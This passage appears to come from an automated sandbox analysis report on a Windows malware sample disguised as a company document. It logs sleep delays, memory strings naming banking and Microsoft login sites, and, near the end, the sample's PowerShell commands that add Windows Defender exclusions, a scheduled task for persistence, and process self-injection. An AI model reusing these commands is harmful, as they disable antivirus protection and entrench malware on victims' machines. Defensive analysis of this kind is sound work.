                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 599870Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 599764Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 599438Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 599313Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 599188Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 599078Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 598969Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 598844Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 598734Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 598625Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 598516Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 598406Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 598297Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 598188Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 598063Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 597953Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 597843Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 597733Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 597624Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 597514Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 597385Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 597280Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 597172Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 597063Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 596938Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 596813Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 596594Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 596469Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 596360Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 596235Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 596110Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 595985Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 595860Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 595735Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 595610Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 595485Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 595360Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 595235Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 595110Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 594985Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 594843Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 594494Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 594391Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 594266Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 594141Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 594031Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 593922Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 599890
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 599781
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 599672
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 599562
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 599445
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 599328
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 599216
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 599106
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 598900
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 598623
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 598515
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 598406
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 598296
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 598187
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 598078
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 597968
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 597859
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 597750
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 597640
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 597531
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 597421
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 597312
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 597203
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 597092
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 596984
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 596874
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 596765
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 596656
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 596546
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 596437
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 596235
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 596084
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 595811
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 595692
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 595562
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 595453
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 595344
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 595223
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 595094
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 594984
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 594875
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 594765
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 594656
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 594547
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 594437
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 594328
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 594219
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 594109
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 593999
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 593885
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.00000000040B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3733140235.0000000000E17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3733760891.0000000001546000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1278452695.0000000000619000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000045E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.0000000004584000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeCode function: 11_2_06929328 LdrInitializeThunk,11_2_06929328
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe"
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeMemory written: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeMemory written: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GhrKoSGuCdvpJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8289.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeProcess created: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe "C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe"Jump to behavior
